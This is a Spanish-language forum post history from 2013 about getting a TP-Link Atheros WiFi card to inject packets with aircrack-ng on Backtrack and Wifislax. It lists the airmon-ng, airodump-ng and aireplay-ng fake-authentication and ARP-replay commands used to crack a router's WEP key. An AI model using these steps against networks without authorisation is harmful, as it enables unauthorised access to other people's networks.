elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Wireless en Linux / Re: Mi tarjeta no inyecta paquetes en: 15 Agosto 2013, 00:37 am
Si de que inyecta, inyecta pero te da un: 26/30 86% o sea que o el router no cacho tus inyecciones (no se deja vamos) o  no llegaron los paquetes.
Intenta otra sintaxis o variante de la inyeccion aca te paso un par:
aireplay-ng -3 -b MAC/AP-AUD -h MACADAPT wlan1
aireplay-ng -3 -x 600 -b MAC/AP-AUD -h MACADAPT wlan1
Vamos  si el router no te responde al ataque no es que no inyecta es que esta parchado, tambien revisa tu A1 y verifica que esta autenticado o por lo menos que se mire como tal O intenta con otro ataque diferente y veras la diferencia...

Me he bajado el Wifislax 4.6 y ya he conseguido que inyecte paquetes utilizando el Minidwep-gtk. Eso sí, la tarjeta enviaba 500 paquetes por segundo y los "Datas" sólo subían a razón de unos 250 por segundo. Si intento sacar la clave por terminal en Wifislax tampoco me inyecta.

Probaré las sintaxis que me has dado. Ni idea de por qué inyecta utilizando Minidwep-gtk y no mediante terminal...

Saludos!
2  Seguridad Informática / Wireless en Linux / Re: Mi tarjeta no inyecta paquetes en: 13 Agosto 2013, 23:47 pm
te recomiendo una Alfa RTL8187 esta es buenisima para inyectar y esas cosas las atheros las veo mejor para navegar no para eso un saludo

Sé que este modelo de tarjeta puede inyectar paquetes por el chipset que tiene y porque el backtrack me dice que puede. Debo de hacer algo mal. No voy a cambiar de tarjeta por esto. Además, me la acabo de comprar. ¿Debo utilizar mejor Wifislax o Wifiway?
3  Seguridad Informática / Wireless en Linux / Re: Mi tarjeta no inyecta paquetes en: 13 Agosto 2013, 20:23 pm
Te pongo lo que me ha salido:

Waiting for beacon frame ([BSSID]) channel 11
Trying broadcast probe requests...
Injection is working!
Found 1 AP

Trying directed probe requests...
[MAC] -channel:11 -[ESSID]
Ping (min/avg/max): 1.508 ms/3.246 ms/9.884 ms Power: -62.85
26/30 86%


Deduzco que sí que puede inyectar paquetes pero a la hora de la verdad no envía ninguno. ¿Es posible que haga algo mal? Estos son los pasos que sigo:

1. Pongo la tarjeta en modo monitor:

airmon-ng start wlan0

2. Rastreo las señales WiFi:

airodump-ng mon0

3. Capturo los paquetes del router:

airodump-ng -c [CHANNEL] -w [NOMBRE] --bssid [MAC] mon0

4. Me conecto al router:

aireplay-ng -1 6000 -q 15 -a [MAC] mon0


Hasta aquí todo bien. Ahora empieza el problema.

5. Intento inyectar los paquetes:

aireplay-ng -3 -b [MAC] mon0

¿El último paso es correcto?

Gracias por la ayuda.
4  Seguridad Informática / Wireless en Linux / Mi tarjeta no inyecta paquetes en: 13 Agosto 2013, 17:19 pm
Hola!

Tengo una tarjeta WiFi Tp-Link WN851ND con chipset Atheros AR9227 o AR9287, ahora mismo dudo. Utilizo Backtrack 5 R3. Todo me va bien: capturo bien los "Data" y si con el otro ordenador que tengo genero tráfico los "Data" suben más o menos rápido pero no lo suficiente como para conseguir los Data requeridos, puedo asociarme correctamente al router (me dice "Association successful :-) (AID 1)") pero a la hora de inyectar paquetes no los inyecta. ¿Por qué puede ser? Creo que mi tarjeta si que permite la inyección de paquetes...

Un saludo y gracias por la ayuda!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines